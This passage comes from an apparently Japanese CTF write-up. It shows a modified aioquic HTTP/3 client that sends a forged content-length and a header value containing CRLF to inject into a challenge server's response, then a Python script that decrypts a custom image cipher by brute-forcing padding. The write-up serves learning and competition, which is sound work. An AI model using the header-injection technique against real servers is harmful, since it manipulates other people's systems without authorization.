from aioquic.quic.events import QuicEvent
from aioquic.quic.logger import QuicFileLogger
from aioquic.quic.packet import QuicProtocolVersion
from aioquic.tls import CipherSuite, SessionTicket

try:
    import uvloop
except ImportError:
    uvloop = None

logger = logging.getLogger("client")

HttpConnection = Union[H0Connection, H3Connection]

USER_AGENT = "aioquic/" + aioquic.__version__


class URL:
    def __init__(self, url: str) -> None:
        parsed = urlparse(url)

        self.authority = parsed.netloc
        self.full_path = parsed.path or "/"
        if parsed.query:
            self.full_path += "?" + parsed.query
        self.scheme = parsed.scheme


class HttpRequest:
    def __init__(
        self,
        method: str,
        url: URL,
        content: bytes = b"",
        headers: Optional[Dict] = None,
    ) -> None:
        if headers is None:
            headers = {}

        self.content = content
        self.headers = headers
        self.method = method
        self.url = url


class WebSocket:
    def __init__(
        self, http: HttpConnection, stream_id: int, transmit: Callable[[], None]
    ) -> None:
        self.http = http
        self.queue: asyncio.Queue[str] = asyncio.Queue()
        self.stream_id = stream_id
        self.subprotocol: Optional[str] = None
        self.transmit = transmit
        self.websocket = wsproto.Connection(wsproto.ConnectionType.CLIENT)

    async def close(self, code: int = 1000, reason: str = "") -> None:
        """
        Perform the closing handshake.
        """
        data = self.websocket.send(
            wsproto.events.CloseConnection(code=code, reason=reason)
        )
        self.http.send_data(stream_id=self.stream_id, data=data, end_stream=True)
        self.transmit()

    async def recv(self) -> str:
        """
        Receive the next message.
        """
        return await self.queue.get()

    async def send(self, message: str) -> None:
        """
        Send a message.
        """
        assert isinstance(message, str)

        data = self.websocket.send(wsproto.events.TextMessage(data=message))
        self.http.send_data(stream_id=self.stream_id, data=data, end_stream=False)
        self.transmit()

    def http_event_received(self, event: H3Event) -> None:
        if isinstance(event, HeadersReceived):
            for header, value in event.headers:
                if header == b"sec-websocket-protocol":
                    self.subprotocol = value.decode()
        elif isinstance(event, DataReceived):
            self.websocket.receive_data(event.data)

        for ws_event in self.websocket.events():
            self.websocket_event_received(ws_event)

    def websocket_event_received(self, event: wsproto.events.Event) -> None:
        if isinstance(event, wsproto.events.TextMessage):
            self.queue.put_nowait(event.data)


class HttpClient(QuicConnectionProtocol):
    def __init__(self, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)

        self.pushes: Dict[int, Deque[H3Event]] = {}
        self._http: Optional[HttpConnection] = None
        self._request_events: Dict[int, Deque[H3Event]] = {}
        self._request_waiter: Dict[int, asyncio.Future[Deque[H3Event]]] = {}
        self._websockets: Dict[int, WebSocket] = {}

        if self._quic.configuration.alpn_protocols[0].startswith("hq-"):
            self._http = H0Connection(self._quic)
        else:
            self._http = H3Connection(self._quic)

    async def get(self, url: str, headers: Optional[Dict] = None) -> Deque[H3Event]:
        """
        Perform a GET request.
        """
        return await self._request(
            HttpRequest(method="GET", url=URL(url), headers=headers)
        )

    async def post(
        self, url: str, data: bytes, headers: Optional[Dict] = None
    ) -> Deque[H3Event]:
        """
        Perform a POST request.
        """
        return await self._request(
            HttpRequest(method="POST", url=URL(url), content=data, headers=headers)
        )

    async def websocket(
        self, url: str, subprotocols: Optional[List[str]] = None
    ) -> WebSocket:
        """
        Open a WebSocket.
        """
        request = HttpRequest(method="CONNECT", url=URL(url))
        stream_id = self._quic.get_next_available_stream_id()
        websocket = WebSocket(
            http=self._http, stream_id=stream_id, transmit=self.transmit
        )

        self._websockets[stream_id] = websocket

        headers = [
            (b":method", b"CONNECT"),
            (b":scheme", b"https"),
            (b":authority", request.url.authority.encode()),
            (b":path", request.url.full_path.encode()),
            (b":protocol", b"websocket"),
            (b"user-agent", USER_AGENT.encode()),
            (b"sec-websocket-version", b"13"),
        ]
        if subprotocols:
            headers.append(
                (b"sec-websocket-protocol", ", ".join(subprotocols).encode())
            )
        self._http.send_headers(stream_id=stream_id, headers=headers)

        self.transmit()

        return websocket

    def http_event_received(self, event: H3Event) -> None:
        if isinstance(event, (HeadersReceived, DataReceived)):
            stream_id = event.stream_id
            if stream_id in self._request_events:
                # http
                self._request_events[event.stream_id].append(event)
                if event.stream_ended:
                    request_waiter = self._request_waiter.pop(stream_id)
                    request_waiter.set_result(self._request_events.pop(stream_id))

            elif stream_id in self._websockets:
                # websocket
                websocket = self._websockets[stream_id]
                websocket.http_event_received(event)

            elif event.push_id in self.pushes:
                # push
                self.pushes[event.push_id].append(event)

        elif isinstance(event, PushPromiseReceived):
            self.pushes[event.push_id] = deque()
            self.pushes[event.push_id].append(event)

    def quic_event_received(self, event: QuicEvent) -> None:
        #  pass event to the HTTP layer
        if self._http is not None:
            for http_event in self._http.handle_event(event):
                self.http_event_received(http_event)

    async def _request(self, request: HttpRequest) -> Deque[H3Event]:
        stream_id = self._quic.get_next_available_stream_id()
        self._http.send_headers(
            stream_id=stream_id,
            headers=[
                (b":method", request.method.encode()),
                (b":scheme", request.url.scheme.encode()),
                (b":authority", request.url.authority.encode()),
                (b":path", request.url.full_path.encode()),
                (b'content-length', b'100'),
                (b"foo", b"bar\r\n"),
            ],
            # + [(k.encode(), v.encode()) for (k, v) in request.headers.items()],
            end_stream=not request.content,
        )
        if request.content:
            self._http.send_data(
                stream_id=stream_id, data=b'a'*100, end_stream=True
            )

        waiter = self._loop.create_future()
        self._request_events[stream_id] = deque()
        self._request_waiter[stream_id] = waiter
        self.transmit()

        return await asyncio.shield(waiter)


async def perform_http_request(
    client: HttpClient,
    url: str,
    data: Optional[str],
    include: bool,
    output_dir: Optional[str],
) -> None:
    # perform request
    start = time.time()
    if data is not None:
        data_bytes = data.encode()
        http_events = await client.post(
            url,
            data=data_bytes,
            headers={
                "content-length": str(len(data_bytes)),
                "content-type": "application/x-www-form-urlencoded",
            },
        )
        method = "POST"
    else:
        http_events = await client.get(url)
        method = "GET"
    elapsed = time.time() - start

    # print speed
    octets = 0
    for http_event in http_events:
        if isinstance(http_event, DataReceived):
            octets += len(http_event.data)
    logger.info(
        "Response received for %s %s : %d bytes in %.1f s (%.3f Mbps)"
        % (method, urlparse(url).path, octets, elapsed, octets * 8 / elapsed / 1000000)
    )

    # output response
    if output_dir is not None:
        output_path = os.path.join(
            output_dir, os.path.basename(urlparse(url).path) or "index.html"
        )
        with open(output_path, "wb") as output_file:
            write_response(
                http_events=http_events, include=include, output_file=output_file
            )


def process_http_pushes(
    client: HttpClient,
    include: bool,
    output_dir: Optional[str],
) -> None:
    for _, http_events in client.pushes.items():
        method = ""
        octets = 0
        path = ""
        for http_event in http_events:
            if isinstance(http_event, DataReceived):
                octets += len(http_event.data)
            elif isinstance(http_event, PushPromiseReceived):
                for header, value in http_event.headers:
                    if header == b":method":
                        method = value.decode()
                    elif header == b":path":
                        path = value.decode()
        logger.info("Push received for %s %s : %s bytes", method, path, octets)

        # output response
        if output_dir is not None:
            output_path = os.path.join(
                output_dir, os.path.basename(path) or "index.html"
            )
            with open(output_path, "wb") as output_file:
                write_response(
                    http_events=http_events, include=include, output_file=output_file
                )


def write_response(
    http_events: Deque[H3Event], output_file: BinaryIO, include: bool
) -> None:
    for http_event in http_events:
        if isinstance(http_event, HeadersReceived) and include:
            headers = b""
            for k, v in http_event.headers:
                headers += k + b": " + v + b"\r\n"
            if headers:
                output_file.write(headers + b"\r\n")
        elif isinstance(http_event, DataReceived):
            output_file.write(http_event.data)


def save_session_ticket(ticket: SessionTicket) -> None:
    """
    Callback which is invoked by the TLS engine when a new session ticket
    is received.
    """
    logger.info("New session ticket received")
    if args.session_ticket:
        with open(args.session_ticket, "wb") as fp:
            pickle.dump(ticket, fp)


async def main(
    configuration: QuicConfiguration,
    urls: List[str],
    data: Optional[str],
    include: bool,
    output_dir: Optional[str],
    local_port: int,
    zero_rtt: bool,
) -> None:
    # parse URL
    parsed = urlparse(urls[0])
    assert parsed.scheme in (
        "https",
        "wss",
    ), "Only https:// or wss:// URLs are supported."
    host = parsed.hostname
    if parsed.port is not None:
        port = parsed.port
    else:
        port = 443

    # check validity of 2nd urls and later.
    for i in range(1, len(urls)):
        _p = urlparse(urls[i])

        # fill in if empty
        _scheme = _p.scheme or parsed.scheme
        _host = _p.hostname or host
        _port = _p.port or port

        assert _scheme == parsed.scheme, "URL scheme doesn't match"
        assert _host == host, "URL hostname doesn't match"
        assert _port == port, "URL port doesn't match"

        # reconstruct url with new hostname and port
        _p = _p._replace(scheme=_scheme)
        _p = _p._replace(netloc="{}:{}".format(_host, _port))
        _p = urlparse(_p.geturl())
        urls[i] = _p.geturl()

    async with connect(
        host,
        port,
        configuration=configuration,
        create_protocol=HttpClient,
        session_ticket_handler=save_session_ticket,
        local_port=local_port,
        wait_connected=not zero_rtt,
    ) as client:
        client = cast(HttpClient, client)

        if parsed.scheme == "wss":
            ws = await client.websocket(urls[0], subprotocols=["chat", "superchat"])

            # send some messages and receive reply
            for i in range(2):
                message = "Hello {}, WebSocket!".format(i)
                print("> " + message)
                await ws.send(message)

                message = await ws.recv()
                print("< " + message)

            await ws.close()
        else:
            # perform request
            coros = [
                perform_http_request(
                    client=client,
                    url=url,
                    data=data,
                    include=include,
                    output_dir=output_dir,
                )
                for url in urls
            ]
            await asyncio.gather(*coros)

            # process http pushes
            process_http_pushes(client=client, include=include, output_dir=output_dir)
        client.close(error_code=ErrorCode.H3_NO_ERROR)


if __name__ == "__main__":
    defaults = QuicConfiguration(is_client=True)

    parser = argparse.ArgumentParser(description="HTTP/3 client")
    parser.add_argument(
        "url", type=str, nargs="+", help="the URL to query (must be HTTPS)"
    )
    parser.add_argument(
        "--ca-certs", type=str, help="load CA certificates from the specified file"
    )
    parser.add_argument(
        "--certificate",
        type=str,
        help="load the TLS certificate from the specified file",
    )
    parser.add_argument(
        "--cipher-suites",
        type=str,
        help=(
            "only advertise the given cipher suites, e.g. `AES_256_GCM_SHA384,"
            "CHACHA20_POLY1305_SHA256`"
        ),
    )
    parser.add_argument(
        "--congestion-control-algorithm",
        type=str,
        default="reno",
        help="use the specified congestion control algorithm",
    )
    parser.add_argument(
        "-d", "--data", type=str, help="send the specified data in a POST request"
    )
    parser.add_argument(
        "-i",
        "--include",
        action="store_true",
        help="include the HTTP response headers in the output",
    )
    parser.add_argument(
        "--insecure",
        action="store_true",
        help="do not validate server certificate",
    )
    parser.add_argument(
        "--legacy-http",
        action="store_true",
        help="use HTTP/0.9",
    )
    parser.add_argument(
        "--max-data",
        type=int,
        help="connection-wide flow control limit (default: %d)" % defaults.max_data,
    )
    parser.add_argument(
        "--max-stream-data",
        type=int,
        help="per-stream flow control limit (default: %d)" % defaults.max_stream_data,
    )
    parser.add_argument(
        "--negotiate-v2",
        action="store_true",
        help="start with QUIC v1 and try to negotiate QUIC v2",
    )

    parser.add_argument(
        "--output-dir",
        type=str,
        help="write downloaded files to this directory",
    )
    parser.add_argument(
        "--private-key",
        type=str,
        help="load the TLS private key from the specified file",
    )
    parser.add_argument(
        "-q",
        "--quic-log",
        type=str,
        help="log QUIC events to QLOG files in the specified directory",
    )
    parser.add_argument(
        "-l",
        "--secrets-log",
        type=str,
        help="log secrets to a file, for use with Wireshark",
    )
    parser.add_argument(
        "-s",
        "--session-ticket",
        type=str,
        help="read and write session ticket from the specified file",
    )
    parser.add_argument(
        "-v", "--verbose", action="store_true", help="increase logging verbosity"
    )
    parser.add_argument(
        "--local-port",
        type=int,
        default=0,
        help="local port to bind for connections",
    )
    parser.add_argument(
        "--max-datagram-size",
        type=int,
        default=defaults.max_datagram_size,
        help="maximum datagram size to send, excluding UDP or IP overhead",
    )
    parser.add_argument(
        "--zero-rtt", action="store_true", help="try to send requests using 0-RTT"
    )

    args = parser.parse_args()

    logging.basicConfig(
        format="%(asctime)s %(levelname)s %(name)s %(message)s",
        level=logging.DEBUG if args.verbose else logging.INFO,
    )

    if args.output_dir is not None and not os.path.isdir(args.output_dir):
        raise Exception("%s is not a directory" % args.output_dir)

    # prepare configuration
    configuration = QuicConfiguration(
        is_client=True,
        alpn_protocols=H0_ALPN if args.legacy_http else H3_ALPN,
        congestion_control_algorithm=args.congestion_control_algorithm,
        max_datagram_size=args.max_datagram_size,
    )
    if args.ca_certs:
        configuration.load_verify_locations(args.ca_certs)
    if args.cipher_suites:
        configuration.cipher_suites = [
            CipherSuite[s] for s in args.cipher_suites.split(",")
        ]
    if args.insecure:
        configuration.verify_mode = ssl.CERT_NONE
    if args.max_data:
        configuration.max_data = args.max_data
    if args.max_stream_data:
        configuration.max_stream_data = args.max_stream_data
    if args.negotiate_v2:
        configuration.original_version = QuicProtocolVersion.VERSION_1
        configuration.supported_versions = [
            QuicProtocolVersion.VERSION_2,
            QuicProtocolVersion.VERSION_1,
        ]
    if args.quic_log:
        configuration.quic_logger = QuicFileLogger(args.quic_log)
    if args.secrets_log:
        configuration.secrets_log_file = open(args.secrets_log, "a")
    if args.session_ticket:
        try:
            with open(args.session_ticket, "rb") as fp:
                configuration.session_ticket = pickle.load(fp)
        except FileNotFoundError:
            pass

    # load SSL certificate and key
    if args.certificate is not None:
        configuration.load_cert_chain(args.certificate, args.private_key)

    if uvloop is not None:
        uvloop.install()
    asyncio.run(
        main(
            configuration=configuration,
            urls=args.url,
            data=args.data,
            include=args.include,
            output_dir=args.output_dir,
            local_port=args.local_port,
            zero_rtt=args.zero_rtt,
        )
    )

これでペイロードを送信する準備が出来ました.
最後に python3 http3_client.py --insecure -d aaa --output-dir . https://sunshine.ctf と実行し, index.html を見ると flag が得られます!
image.png
レスポンスも,予想した通りのものになっています.

以上です.
後半の,実際に CRLF インジェクションを含んだペイロードを送る所が最もつまった箇所でした.
それが出来るようになった時点でかなり大会終了が近づいており,最初に疑似ヘッダーで試してダメだった後,とりあえずと通常ヘッダーでも試してみたところいけた,という感じでした.
HTTP/3 に直接触れるいい機会になり,とても楽しかったです.

Misc

[Medium] Decrypt

独自の方式で暗号化された16枚の画像ファイルが与えられるのでそれらを復号化する問題.
README.pdf に暗号化方式の詳細が書いてあります.
基本的には暗号化の逆操作を丁寧に実装していけば良いです.

ただしパディングについて注意しなくてはなりません.
暗号化の際,データが必要な長さに足りない場合適宜パディングされます.
しかしこのパディングの長さが暗号化されたデータからは一意に特定出来ない為,パディングの長さを全探索する必要があります.
パディングは暗号化アルゴリズムにおける手順1,2,5の三ヶ所で行われ,あり得るパディングの長さはそれぞれ,0 以上「鍵4」未満, 0 以上「鍵4」未満, 0 以上 8 未満です.
従ってこれらの範囲を全探索します.
幸い,与えられるファイルの「鍵4」の値は高々 14 なので,殆ど時間はかかりません.
(仕様上「鍵4」の最大値は 65535 っぽいのですが,この場合探索範囲が 34359738368 通りになり,かなり時間がかかりそうです.)
詳しくは以下の復号化コードを参照してください.

decrypt.py
decrypt.py
import struct

from Crypto.Cipher import AES
from Crypto.Util import Padding


def encrypt_aes(key, data):
    cipher = AES.new(key=key, mode=AES.MODE_CBC, iv=key)
    return cipher.encrypt(Padding.pad(data, AES.block_size, "pkcs7"))


def decrypt_aes(key, data):
    cipher = AES.new(key=key, mode=AES.MODE_CBC, iv=key)
    return Padding.unpad(cipher.decrypt(data), AES.block_size, "pkcs7")


def byte_to_array(data, size, padding):
    ret_size = (8 * len(data) - padding) // size  # 返す array のサイズ
    ret = []
    buf = 0
    buf_bitsize = 0
    cnt = 0
    for _ in range(ret_size):
        while buf_bitsize < size:
            buf += data[cnt] * pow(2, buf_bitsize)
            buf_bitsize += 8
            cnt += 1
        ret.append(buf % pow(2, size))
        buf //= pow(2, size)
        buf_bitsize -= size
    return ret


def array_to_byte(arr, size, padding):
    ret_size = (size * len(arr) - padding) // 8  # 返す byte の長さ
    ret = b""
    buf = 0
    buf_bitsize = 0
    cnt = 0
    for _ in range(ret_size):
        while buf_bitsize < 8:
            buf += arr[cnt] * pow(2, buf_bitsize)
            buf_bitsize += size
            cnt += 1
        ret += (buf % pow(2, 8)).to_bytes(1, "little")
        buf //= pow(2, 8)
        buf_bitsize -= 8
    return ret


def conv_2d(arr, row_size):
    arr.extend([0] * ((row_size - len(arr)) % row_size))
    data = []
    for i in range(0, len(arr), row_size):
        data.append(arr[i : i + row_size])
    return data


def conv_1d(data, padding):
    arr = []
    for y in range(len(data)):
        for x in range(len(data[0])):
            arr.append(data[y][x])
    arr = arr[: len(arr) - padding]  # padding 分を削除
    return arr


def generate_key(a0, a1, n, bit_size):
    mod = pow(2, bit_size)
    dp = [0 for _ in range(n + 1)]
    dp[0] = a0 % mod
    dp[1] = a1 % mod
    for i in range(n - 1):
        dp[i + 2] = (dp[i + 1] + dp[i]) % mod
    return dp[n]


def decrypt_round(arr, key_a, key4):
    xsize = len(arr)
    key_a = (pow(2, key4) - 1) ^ key_a
    for _ in range(10):
        new_arr = [[0] * key4 for _ in range(xsize)]
        for x in range(xsize):
            for y in range(key4):
                new_arr[x][y] = arr[(x + y) % xsize][y]
        arr = new_arr

        new_arr = [[0] * key4 for _ in range(xsize)]
        for x in range(xsize):
            for y in range(key4):
                new_arr[x][y] = arr[x][(y + x) % key4]
        arr = new_arr

        for i in range(xsize // 2):
            for j in range(key4):
                if (key_a >> j) & 1:
                    arr[2 * i][j], arr[2 * i + 1][j] = arr[2 * i + 1][j], arr[2 * i][j]

        key_a = (pow(2, key4) - 1) ^ key_a
    return arr


def decrypt(data, key_a, key4, padding_1, padding_2, padding_5):
    if (8 * len(data) - padding_5) % key4 != 0:
        raise Exception  # padding の長さが不適
    arr1 = byte_to_array(data, key4, padding_5)
    arr2d_1 = conv_2d(arr1, key4)
    arr2d_2 = decrypt_round(arr2d_1, key_a, key4)
    arr2 = conv_1d(arr2d_2, padding_2)
    if (key4 * len(arr2) - padding_1) % 8 != 0:
        raise Exception  # padding の長さが不適
    byte2 = array_to_byte(arr2, key4, padding_1)
    return byte2


def unpack_meta(data):
    key1, key2, key3, key4, size = struct.unpack("<IIHHI", data[:16])
    return key1, key2, key3, key4, data[16:32], size


def decrypt_file(src_path, dst_path):
    with open(src_path, "rb") as f:
        data = f.read()
    key1, key2, key3, key4, key5, size = unpack_meta(data)
    data = data[32:]
    key_a = generate_key(key1, key2, key3, key4)
    dec1 = decrypt_aes(key5, data)
    for padding_1 in range(key4):  # 処理1における padding の長さ
        for padding_2 in range(key4):  # 処理2における padding の長さ
            for padding_5 in range(8):  # 処理5における padding の長さ
                try:
                    dec2 = decrypt(dec1, key_a, key4, padding_1, padding_2, padding_5)
                    dec3 = decrypt_aes(key5, dec2)
                    with open(dst_path, "wb") as f:
                        f.write(dec3)
                    return 1
                except:
                    pass
    return 0


for i in range(16):
    print(f"Decrypting {i}.enc...", end="", flush=True)
    if decrypt_file(f"{i}.enc", f"{i}.enc.png"):
        print("Done")
    else:
        print("Error")

最後に

準優勝出来るとは全く思っていなかったので,とても嬉しかったです!
しかし分からなかった問題や時間が無く解ききれなかった問題もあったので,そこが心残りです.
特に Misc の Easy 問 "Swifty" を解けなかったのが悔しい所ですね.
README 通りに環境構築等行ったのですが,Ghidra の結果を見ても動作の詳細が分からず,GDB によるデバッグも困難でお手上げ状態でした.
また Malware Analysis についてもまだほどんど勉強した事がなく,何とか Easy は解くことができましたが他はまだ解けて無いので,入門して upsolve したい所です.
Malware Analysis は以前から興味は非常に大きかったのですが中々始めるきっかけが無かったので、今回を機に勉強してみようと思います.
(おすすめの入門法があれば教えてください m(_ _)m)

解いていて楽しい問題ばかりで,学びも多く,本当に参加して良かったです.
改めて,ありがとうございました!

2
1
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
2
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?